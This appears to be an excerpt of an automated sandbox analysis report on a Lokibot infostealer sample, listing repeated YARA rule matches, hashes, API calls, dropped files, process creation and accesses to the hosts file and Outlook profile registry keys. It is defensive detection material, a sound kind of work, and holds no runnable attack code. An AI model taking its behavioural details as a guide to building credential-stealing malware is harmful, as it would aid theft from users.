                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: dhGoVvfmul.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00406BFE0_2_00406BFE
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040549C2_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_004029D42_2_004029D4
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: String function: 00405B6F appears 42 times
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dehbibhar.exe A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy) A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                Source: dhGoVvfmul.exeVirustotal: Detection: 44%
                Source: dhGoVvfmul.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile read: C:\Users\user\Desktop\dhGoVvfmul.exeJump to behavior
                Source: dhGoVvfmul.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\dhGoVvfmul.exe "C:\Users\user\Desktop\dhGoVvfmul.exe"
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvplJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvplJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile created: C:\Users\user\AppData\Local\Temp\nsg1FBC.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@45/1
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: dhGoVvfmul.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wntdll.pdbUGP source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
